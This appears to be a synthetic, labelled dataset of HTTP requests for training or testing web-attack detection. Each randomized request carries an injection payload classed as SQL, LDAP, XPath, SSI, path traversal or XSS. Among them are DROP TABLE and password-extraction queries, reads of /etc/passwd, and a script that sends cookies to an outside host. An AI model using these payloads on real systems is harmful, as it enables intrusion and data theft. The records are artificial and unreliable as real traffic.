Cookie2: $Version="14"
Date: Sat, 26 May 07 03:29:13 UTC
ETag: W/"FVdxZvFAz4j68bNZ95W0"
Expect: eatl
From: sotSFlSe@qiksat.biz
If-Modified-Since: Fri, 08 Jan 10 02:03:48 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:20:53 GMT
If-Match: "Rll_MEez1Nm1-@4VHONL"
If-None-Match: *
If-Range: "cB1oQ@yo3ygkubrCeISc"
Max-Forwards: 9008
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dDhhbmNydDpzb3Y0ZQ==
Range: 75-618834,757-411,77394-267269
Referer: /eablef/oxee9n.avi
TE: gzip
Trailer: From
User-Agent: Mozilla/9.8 (Windows; U; Win 9x 3.7; 9l-xy; rv:9.2.1) Gecko/40734775
UA-CPU: MIPS
UA-Disp: 930,1675,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6269x194
Via: 6.0 www.oseku9.gif:7801
Transfer-Encoding: identity
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 864 193.255.239.241 "chohneoi" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36359
Start - Id: 41636
class: SqlInjection
GET /t7Zk2Y3T_Rjd.Jr/j7F/lpositionN/pYVzXKf@aq/LIW/9sro6afaaleidnetyi/eIisOxGdZKqHC@/Ohailte9/er/VUmkRuW1l6BBbGe/1_cmdytmp7dVand.html?laaolyvgTteanl=%3Egad%40&U6body9=id9n+c&qntiyscntl=soehcm&8vs1otw0=ic2e&l-oQzbC02h8R=%27++OR+++++%27ei%27+%3D+++++%27ft%27%2B%27itv%27&beeThdgr=198 HTTP/1.0
Host: 166.99.220.57:80
Connection: e4b9exa
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: 3=eaRnOnah
Client-ip: 250.22.146.196
Cookie: chCcZU=ekAxe2a17ncdl
Cookie2: $Version="469"
Date: Tue, 15 Feb 05 18:12:35 UTC
ETag: W/"hmTxEJ5FkJRToMJo."
Expect: 100-continue
From: xrtw@gme1s0.it
If-Modified-Since: Fri, 27 Feb 04 12:44:55 UTC
If-Unmodified-Since: Fri, 18 Nov 05 09:51:58 CET
If-Match: "YfyF@F3US0_N7MgD5oI"
If-None-Match: "@@0ePc4vYQG8BPHB"
If-Range: Sun, 04 Sep 05 20:15:18 UTC
Max-Forwards: 8
MIME-Version: 5.2
Pragma: e='Telgnmon'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: Digest cnonce="4es6ha"
Range: -11289
Referer: /hRjIht/Etay.bin
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 1.9; I1-dE; rv:3.6.1) Gecko/04520854
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 3.7 www.eIetb.html, FTP/7.9 www.vdnM.tiff, HTTP/7.1 25.4.86.192
Transfer-Encoding: deflate
Upgrade: hzse/6.1
Warning: 419 www.riae.jpeg "t4xtspnneyygypw1bdf" "Thu, 20 Aug 09 21:25:22 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41636
Start - Id: 46375
class: PathTransversal
GET /S89ROd/tmt.jpeg?ttn0caOmtq=3KH9rJYzP&R0osdvtE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&vZlowinntH30biOz=01063&jp=43691&Ntciem=Mee8fceneuta&S9olfsdRc=1sat3%40ninZitz&dBBTR=i&ae9tndd=fromaenrt&jltfreSlhsAotq4=83&8a=r8vM&pfhl7crtdofruaA=h2%3Es+wet%24m1&waI7ivyeoka=wrhb&n3t=an%2Bzemrdeb HTTP/1.0
Host: 73.41.49.129
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.4, identity, gzip, compress;q=0.8, compress
Accept-Language: *;q=0.4
Cache-Control: min-fresh=623
Client-ip: 86.247.207.18
Cookie: ts1ohnmp7N=c1;iid7tr9=(%uSchilde/j&(sm=+;62estslmgeNRan9=8379
Cookie2: $Version="86"
Date: Tue, 18 Aug 09 17:30:44 UTC
ETag: "GFsg.faK@trgN@CsoV"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Sat, 12 Jan 08 21:14:00 UTC
If-Match: "kMla4HoPweULTAzJn"
If-None-Match: "eQcYy13@dA3YmJRH"
If-Range: "zOITDYoJbD-BDD6F"
Max-Forwards: 3
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Basic aWJkZTowaG85RWR0dA==
Range: 2-1818,846125-
Referer: /eesm.exe
TE: deflate
Trailer: Date
User-Agent: Mozilla/5.6 (Windows; U; Win98 1.6; cc-et; rv:7.4.9) Gecko/75221009
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: HTTP/1.9 101.177.4.194, Iefdf/2.8 181.122.189.11, 7.4 116.127.38.140
Transfer-Encoding: compress
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46375
Start - Id: 38336
class: LdapInjection
GET /aPCJ249Ne2ErLWlz/lbeaueowiOtRIoefede/mnltswrulaa/mxOa3yU/lSh6kp07/itl9ruh3/TtZYNYDuJ-_.exe?rrb4=7eh%29%28+++%7C%28wwsnr%3D*%29&aobTcon=nsue7Oxot0dade&JxQ0=1975920&w6obnDet=7732280538&vl0MjcexInmyloe=a&zg=342 HTTP/1.0
Host: 32.215.18.223
Connection: hi3hm
Accept: video/*;q=0.4
Accept-Charset: x-mac-greek, iso-8859-6;q=0.6, x-mac-chinesesimp;q=0.3, iso-10646-ucs-2;q=0.6, iso-2022-jp;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: sth6f-ootsoAni, e-Iiti, t-9;q=0.2
Cache-Control: max-stale=22
Client-ip: 116.63.205.12
Cookie: 25etunoutb9rtv=odimeaee7anoEasax
Cookie2: $Version="689"
Date: Sat, 18 Dec 04 04:55:43 CET
ETag: "WbPrN@xJVi3tQ@DS"
Expect: 2aro
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 13 Jun 09 05:20:33 CET
If-Unmodified-Since: Wed, 11 Mar 09 16:47:28 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 30 Dec 04 21:04:32 CET
Max-Forwards: 36
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: NTLM aDhsZW5ld0l1ZW85aWNkaE8ydG5CaGlub2tEb2x6aW81ZHJaZUtjb2Fl
Range: 4549-1
Referer: /sdtoE/ebgta/aa3n1ruc/ixdzece6.tiff
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: c2Zj_U http://www.tbgt.it
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6454x625
Via: HTTP/2.3 218.98.66.152, HTTP/1.1 164.28.196.222, 4.9 www.hoo0Rrt0.shtml
Transfer-Encoding: identity
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38336
Start - Id: 35434
class: SqlInjection
GET /L252K70TuL.I/uuxNboot.ini/nVtmRwinntIjtMa_/ttvdCptoadlntIisyclt/hCoe@N8hNb6c6zDZZMm0/NhghTonac68Tuom/rjn.swf?wp-Irboot.inixpassthru573WC2=816&wttl=grirositItlnazs1&s8=eyA+cstyleee&h04=%27+++++union+++select++%40%40version%2C1%2C1%2C1-- HTTP/1.0
Host: www.irl2is.be:80
Connection: Z1piaTe
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, cp-936;q=0.6, x-mac-turkish;q=0.4, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: ttintne='fiveiBs'
Date: Fri, 29 Jul 05 12:15:43 UTC
ETag: W/"5rgyakrT9GajtwJuxJ"
Referer: http://www.itnt.st/g3mateDe/anrnnnuh/uSrie.aspx
User-Agent: 5feiob9p (n-@SSznls; meAL8mmz-; lOzF0Llm; skgnem)
UA-OS: FreeBSD
Via: HTTP/6.6 66.160.77.210, 2.2 34.103.127.232, 7.5 195.110.249.122

null

End - Id: 35434
Start - Id: 46457
class: PathTransversal
POST /a8srSiezt/ee2t5i2Anood/e6aetjhslgeTi/e3iTm3L7p3Mn1ft/d-GKVZ5CVv1XAOOZd1ac/hzdARKBAWJC/adxlzs6delrntseitaok/i0rkabgegooitgepjh/ePHb2tECs4ons/HQximgCnqjxml-@1id8h.aspx? HTTP/1.1
Content-Length: 110
Content-Language: tE,txesmd,bsno3
Content-Encoding: gzip
Content-Location: /mitnhm/rmle2/s4tec/ygtbegre/Ser0.mpeg
Content-MD5: c25kOXRzZWVtZHQ2VHRhNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Apr 09 23:02:37 CET
Last-Modified: Tue, 27 Jan 04 16:10:23 CET
Host: 3.194.242.72
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-9, x-mac-icelandic
Accept-Encoding: *;q=0.9
Accept-Language: sthneno6-ddttu;q=0.3, 7afEEd-ietbT
Cache-Control: no-transform
Client-ip: 53.157.57.90
Cookie: olr=j:/.htaccess~
Cookie2: $Version="12"
Date: Wed, 22 Mar 06 04:42:02 GMT
ETag: "71ODRP94enHFvSy.T"
Expect: 100-continue
From: h8va@2gctni.it
If-Modified-Since: Tue, 20 Jan 04 04:22:21 CET
If-Unmodified-Since: Fri, 25 Nov 05 16:56:48 UTC
If-Match: "oekJ5z7Sw0ZHkw2L0jCn"
If-None-Match: "x_iIYcZ7uyaVlAP"
If-Range: Thu, 09 Apr 09 09:51:58 GMT
Max-Forwards: 714
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: be1hrk yaoU7=aypDnr7
Authorization: Digest opaque="b3xln"
Range: 6852-5193,8321-23318
Referer: /tfceyC/boHuSy/eofne/gt6yei.png
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.8 (Windows; U; Win98 5.3; ih-eh; rv:6.6.7) Gecko/35301217
UA-CPU: StrongARM
UA-Disp: 739,8713,16
UA-Color: color8
UA-Pixels: 409x6935
Via: 2.5 213.83.255.188
Transfer-Encoding: identity
Upgrade: leehiz/2.0, yskn/5.1
Warning: 116 www.resobEh.jpeg:51327 "etnastlc5" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

totastan=eeo4inaejtnem&ko=204&hS2vo3UD=ogartjedg&pta=92&eu=81&nt4qsthe=9661314684&ssEy6v=48&a0eftbxMj8N=aUY4BS

End - Id: 46457
Start - Id: 42283
class: SqlInjection
GET /W-A/unede/nSGW8WR@/tvspsaseOahrnni71m.asmx?havingT1IbRpDk=ny9%40k&dT=%5Crl&SJpg5DeEGq=55758&ls6Egxumgtd=nceEor%2530cNi&npl=%27%3B+drop++table++admin&tl0dicthdrsFsnl=tna0a9aDeniaK HTTP/1.0
Host: www.ufdeEw.biz:80
Connection: keep-alive
Accept: application/*;q=0.8
Accept-Charset: windows-1254;q=0.7, utf-7;q=0.2
Accept-Encoding: 
Accept-Language: tisa-2nay3S, 5gllcest-e0auuo, jK-e;q=0.4, ORnoN-ei
Cache-Control: max-stale=27257
Client-ip: 208.207.204.31
Cookie: ocotrofi0rlecel=gaIbelfers;lnasnsf=sBjrnaiOvnr er;hmUmxAerCHEs=where
Cookie2: $Version="134"
Date: Thu, 05 Jun 08 08:50:06 CET
ETag: W/"SyK1n.19kL0w4qlNg9H6"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 19 Oct 09 12:27:00 GMT
If-Unmodified-Since: Sun, 12 Aug 07 07:55:00 CET
If-Match: "YpPdA1FBb2.PpIB-"
If-None-Match: *
If-Range: "6kNai0wxdgBmfbZ"
Max-Forwards: 7912
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: 61054-811,85050-750977,-261
Referer: /sroedOe/eora1rH/eaSon0/ie5n8tn.mdb
TE: gzip
Trailer: Upgrade
User-Agent: dpiwty1 (ncLc@rLV; 3Ed5b6Aarf)
UA-CPU: 68000
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5265x544
Via: lJI2ts/8.9 www.SImcoEy.tiff:4638
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 27.160.160.90
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42283
Start - Id: 38766
class: LdapInjection
GET /httpRAypcAP/oRQMh@N4wajU9/o3/laf/iVyuc8y/cccbYYnaoadtDe/bzpL93/aoyxu.bin?cniQWcMqdocumentWIv=851607&tesurn=3620030&hheEod4mhe=y84&15iei8tdS=03&gdihoeNnte=natMj4ntew&nu=Prsat8s&ednl=t%3Fh+dJe%5Da4ie&pahenmuus=ic2t&yrITrsE=8542522414&iS=772309&ALebetweenc=aooi&nw=7556496&rghRdaTjl5t7lmo=%29+%28++++%7C+%28+++cn%3D*o++%27brien*+%29%28mail++++%3D*o++++%27brien*+++%29 HTTP/1.0
Host: www.mnqseutu5.cz:265
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-5, iso-8859-8, cp-950;q=0.4, x-mac-icelandic;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 156.223.39.67
Cookie: GRa=ate16tibiiss;thGsee8a=(esws;inputpSp3=9536869;na=ssd5eaxo;onaCE=divlqaOsock_streamiiM;wexr214af81=lR
Cookie2: $Version="4"
Date: Tue, 12 Apr 05 02:16:36 CET
ETag: W/"JGyuh3.3J58-vPmC"
Expect: 100-continue
From: 0seAs@thoats.st
If-Modified-Since: Fri, 09 Jan 04 07:10:08 UTC
If-Unmodified-Since: Fri, 23 Apr 04 05:46:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 78
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: edzh nuUs2osn=ijuohy
Range: 7-
Referer: /goeQw/ransoynd.cgi
TE: trailers,gzip;q=0.1,trailers
Trailer: Date
User-Agent: 8fTtnco6b (r1jUsRVIC; nDf6owVl; lz7thiTq; e4t9qalN)
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: FTP/4.1 47.190.187.73, 6.8 98.35.28.47
Transfer-Encoding: gzip
Upgrade: qUr/2.7, rRt/2.0, b9eynm/6.6, RsT6/5.1
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38766
Start - Id: 36117
class: PathTransversal
GET /ogNGbHv46/LwyCHeeQa7xQ.sh?1bl=729&TTXVc-2t6EWB=f%3A%5Cwinnt%5Cboot.ini&o5lsaa=Od%40logl05ihy+mit0wb%29&manstlic=104464 HTTP/1.0
Host: www.nevLue2grh.net
Connection: nmzLasxe
Accept: image/png;q=0.7
Accept-Charset: iso-8859-8-i;q=0.6, windows-1250, x-mac-arabic;q=0.0, iso-8859-8, shift_jis;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: fwi-f;q=0.2, E-g7;q=0.2
Cache-Control: no-transform
Client-ip: 180.199.9.54
Cookie: Rp=i2e-NC
Cookie2: $Version="406"
Date: Tue, 03 Nov 09 24:14:25 UTC
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 18 Feb 09 10:04:32 GMT
If-Unmodified-Since: Sun, 06 Sep 09 14:14:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.1
Pragma: h=6etna
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 9844-66,0-,-297
Referer: /hletneeA/hMfsdeEs/ehfnE3/tssrheD.bin
TE: chunked
Trailer: Max-Forwards
User-Agent: p5caJep http://www.fcu7Nw.uk
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: 4.3 www.nhwhomS5.gif, 4.8 www.eienh.js
Transfer-Encoding: gzip
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36117
Start - Id: 41762
class: SqlInjection
GET /aa/9ab2SoBB/ftreq/lTrda8aa0Yttlmddv/dionbcrntebtEd/oaotral4pinnyLvm/r6H78xx5D/le7trupv/tW/snnOfA7illckeeIvuneS.msf?lmy=%27%3B+++++begin+++declare++++%40ret+varchar%288000%29+set+++++%40ret%3D%27%3A%27+++++select+%40ret%3D%40ret%2B%27+++%27%2B6o3ijwq%2B%27%2F%27%2Bpassword++++from+++++aae1udIj+++where++++ntwf%3E%40ret+++select+++++%40ret+++++as+++ret+++++into++++foo+++end--&oHslT1FrCla=16580&rfQb=4674481&BkANgxp_l=hbdsXtQ HTTP/1.0
Host: www.a3dxir.uk:205
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.0, identity, gzip
Accept-Language: t-iam, xbz-3dei6, suty7-let1, TfRkoqmb-tniltep, t-znpe5sd
Cache-Control: no-store
Client-ip: 34.136.27.140
Cookie: .Xi-qHVi8=31;erla=4874;ndgslocoia=g9ts;aeft2i0=access_log\ ;a4pnasw5e=lelike
Cookie2: $Version="99"
Date: Tue, 13 Jun 06 19:39:02 GMT
ETag: "xdRpcd80difxy7zp-Wn"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Mon, 26 Jan 04 07:28:11 GMT
If-Unmodified-Since: Mon, 24 Jul 06 04:52:30 UTC
If-Match: "gDP@ZAnsleJxq6xth8"
If-None-Match: "oBBsLb.qbM62md.zyB"
If-Range: *
Max-Forwards: 8488
MIME-Version: 3.6
Pragma: iytsmoze='dofTo'
Proxy-Authorization: Basic c0F0b3k6ZW4wbm9vdG0=
Authorization: Digest nonce
Range: 4234-490888,-164882
Referer: /onssv6i/nri660Nt/iNuYx.gz
TE: gzip;q=0.9
Trailer: Cache-Control
User-Agent: mc9nhxae/9.8.3
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9206x518
Via: FTP/6.6 80.232.6.242:88, 5.7 www.ltjet.js, 8.0 138.214.11.40
Transfer-Encoding: identity
Upgrade: smh6/1.5, nsded/2.1, ezu/4.9, ie5rE/9.9
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41762
Start - Id: 35907
class: XPathInjection
POST /d9IBSF7E.CGWSSWUW/ieeoelshahnci3sn.gif? HTTP/1.1
Content-Length: 145
Content-Language: ti6ddla,dvinlnt
Content-Encoding: gzip
Content-Location: /aag4o/2teo/9eavtt/ndeUe/ruSo.mdb
Content-MD5: bGdvaW5lbzNob0hydGQ5bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Dec 05 10:32:32 CET
Host: 211.184.93.242
Connection: ha7S
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.6, identity;q=0.5, compress
Accept-Language: *
Cache-Control: e='mI'
Client-ip: 137.208.9.219
Cookie: nrac=eaSTP;t6esfcaEOeeiro=oi5rw5wngDnjk;Zh7sgLdmptr=wsooErnn;0sfnNqtnner0eth=NiCi'     or l6Tii/h/child::node()[processing-instruction()=607]    or  'tghod' ='
Cookie2: $Version="338"
Date: Thu, 22 May 08 08:16:03 UTC
ETag: W/"cLs.sPEpLbITxmItq"
Expect: cRaebo6
If-Modified-Since: Sun, 29 Nov 09 23:34:06 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Dec 05 06:10:20 CET
Max-Forwards: 6989
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic Z2R0ZzpmMXRydGg=
Authorization: Digest uri=/dsye/kgrssas.cfm
Range: 108443-,-89546,58-675882
Referer: /nhoiN/ipsDa.pl
TE: trailers,chunked,chunked
Trailer: User-Agent
User-Agent: WteentHe/5.1.8.2
UA-Disp: 7456,654,8
UA-Pixels: 5230x8375
Via: 8.8 142.149.250.136, 8.6 27.200.62.118
Transfer-Encoding: oupan
Warning: 665 227.183.127.64 "uereigdeiccad5sfxruj" "Fri, 31 Dec 04 19:45:33 UTC"
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

adxtoppDwc0t=aeEus5oiilds31dtor&ymNyAmruhysIn=9BJW7OrYjNB&ne=3148332470&w0yk_Owmq=501779&iatsuofnf=?ncT h&iiahb2=5e l053hhlit(Dej2window.open

End - Id: 35907
Start - Id: 37053
class: LdapInjection
GET /izbXfo_br6TvFJ/lzds.9YgdPM/t71PGgzbM-CuZ0sWrnXy/higfcmsutSat4i0fspns/cjed9weeflen/-mX/k-6TS/0f1uW-6y1Uw.JfmAc/j1sh/z1pwec/eh.php?49pRwrotrhcud=491%29%28%26%28objectClass%3DrO0W%29%28%7C%28sn%3D++++te5%29%28cn%3Dr+++J*%29%29&isxhaejunt=%3Asua6ie HTTP/1.0
Host: 108.65.16.247
Connection: close
Accept: */*
Accept-Charset: utf-7, x-mac-arabic
Accept-Encoding: compress;q=0.2, compress;q=0.2, gzip, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 197.60.249.140
Cookie: D6e=e;4qZIneSzi=113222
Cookie2: $Version="68"
Date: Fri, 01 Aug 08 19:53:57 GMT
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: ibiyuSf@istTee.cz
If-Modified-Since: Fri, 07 Aug 09 20:36:45 GMT
If-Unmodified-Since: Sat, 31 Oct 09 24:02:31 UTC
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: "q@hzPsFAL1z1fYHKmt"
If-Range: Fri, 16 Mar 07 15:56:45 UTC
Max-Forwards: 74
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 5i2re 1lveu=8spaotso
Range: 03242-,-0
Referer: http://0ye9ly.biz/ehntWw.pdf
TE: deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.1 (compatible; Konqueror/0.3; Linux i586; Otcjnlt; heeeao)
UA-CPU: 68000
UA-Disp: 907,610,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 716x540
Via: FTP/8.1 227.59.221.156:33645, 3.3 www.liisn.tiff:528, 2.5 135.195.193.246
Transfer-Encoding: compress
Upgrade: rca/1.3
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37053
Start - Id: 46129
class: PathTransversal
GET /wt.shtml?E8oae4gralas=rbS%40%402&ntg0gjh=%2Fetc%2Fpasswd&bBdlb8cvdxeItdr=EguiHoETan&sohrerd46=410438875&Eahtn=nlchild&8an6oGehisr=623588 HTTP/1.0
Host: 19.140.108.73:80
Connection: abq7hb
Accept: image/gif;q=0.8, text/*
Accept-Charset: iso-8859-7;q=0.4, iso-8859-5;q=0.5, windows-1257;q=0.9, x-mac-hebrew, windows-1252
Accept-Encoding: *;q=0.5
Accept-Language: dnam6tr-envExon, luiae-fl8rnonl;q=0.6, 3-A;q=0.3, i-lfa;q=0.3, aslaae-aeozLov
Cache-Control: max-stale=2
Client-ip: 47.195.137.247
Date: Fri, 06 Jan 06 02:38:46 GMT
ETag: W/"L3OoBM0r1pRvJnxsFE0"
Expect: 100-continue
From: D5iy@onoashcm.cz
If-Modified-Since: Mon, 17 Nov 08 13:26:51 GMT
If-Unmodified-Since: Wed, 25 Jun 08 09:47:21 CET
If-Match: *
If-Range: Mon, 27 Sep 04 10:27:45 UTC
Max-Forwards: 380
Pragma: byd=bdsaos
Proxy-Authorization: Digest algorithm=MD5-sess
Referer: /droau/otyettt/o16hnda.jpg
TE: chunked,trailers,trailers
User-Agent: cgnblaa (iLpZu0sp)
Transfer-Encoding: compress
Upgrade: ftobhh/1.0
X-Serial-Number: 83931

null

End - Id: 46129
Start - Id: 39277
class: SSI
GET /sdtx/7bZyo7z/0.8-FqAGCKRPvUiAH/.gveupdateIDbetween_y8.jpeg?o4ir5gs0b=eiZY9&ih=%3Ehle&aolaagEakftlpsx=74&eqtr=76359&e0txmiLe8trrdet=6U31SFiJB&vk7.=oeiafgnoby8b&atetejt=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: www.seislmm.be:80
Connection: r3th9e
Accept: audio/x-wav;q=0.7, image/*
Accept-Charset: iso-2022-kr, x-mac-hebrew
Accept-Encoding: gzip;q=0.4, gzip;q=0.6, deflate, compress
Accept-Language: nhe-rb;q=0.3, afl-tS;q=0.2
Cache-Control: max-stale
Client-ip: 121.71.239.178
Cookie: ol=8e
Cookie2: $Version="26"
Date: Sun, 17 Sep 06 06:14:52 GMT
ETag: W/"7PpJzZ6D.Le.Qph7"
Expect: noLlvuuy=4Nlu;scbAseot=Ieghso
From: tdoqaue@tuogttti.uk
If-Modified-Since: Sun, 07 Nov 04 21:04:56 CET
If-Unmodified-Since: Sun, 18 Dec 05 03:53:40 CET
If-Match: *
If-None-Match: "YJ6_IBEgLCAuFLCve"
If-Range: *
Max-Forwards: 27
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: NTLM dEVldWpycHRvZW50ZXpicHNtZXN4b2Vpdm50bjdobmFidQ==
Range: -219632,263179-06080,264504-7
Referer: /fnsos/qhlso/stLueHh/rstrt.mspx
TE: chunked
Trailer: Via
User-Agent: qPQ@Gbjl http://www.ehmkshog.org
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 320x017
Via: FTP/4.4 www.7stn.png:0, pbpm/4.8 www.ccahse.css
Transfer-Encoding: deflate
Upgrade: dde/7.5
Warning: 372 www.exhwh.jpeg "h0t3bfwddlgralo9" "Thu, 10 Jun 04 17:14:38 UTC"
X-Forwarded-For: 190.235.131.102
X-Serial-Number: 420641623640
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39277
Start - Id: 47945
class: XSS
GET /eatt/dFfdHzhRBCwkxAiWc1/hredeeeaeGenEtmce/OywgetB@tLb.Ytu.jpeg?t1o=passthru&NctmpO=%3Cimg++src%3D++++%22+javascript%3A+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.rond.com%2Fcgi-bin%2Ftrmetais.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E&t0rvyiupINi=ge HTTP/1.1
Host: 151.17.6.213:1
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.8, identity;q=0.9
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 55.58.52.249
Cookie: nost0n=:eew;4Air6os=) wn[orrzstront
Cookie2: $Version="30"
Date: Thu, 26 Jul 07 07:04:05 UTC
ETag: "dkVEE-H0oxW@ES_Bxo3p"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Wed, 08 Nov 06 17:51:17 GMT
If-Unmodified-Since: Sun, 08 Feb 04 21:36:17 UTC
If-Match: "_@TaipZZGQ5OuW1tZM"
If-None-Match: "xhaI2nSaWkW7H4JzdW2"
If-Range: Tue, 04 Mar 08 04:52:56 UTC
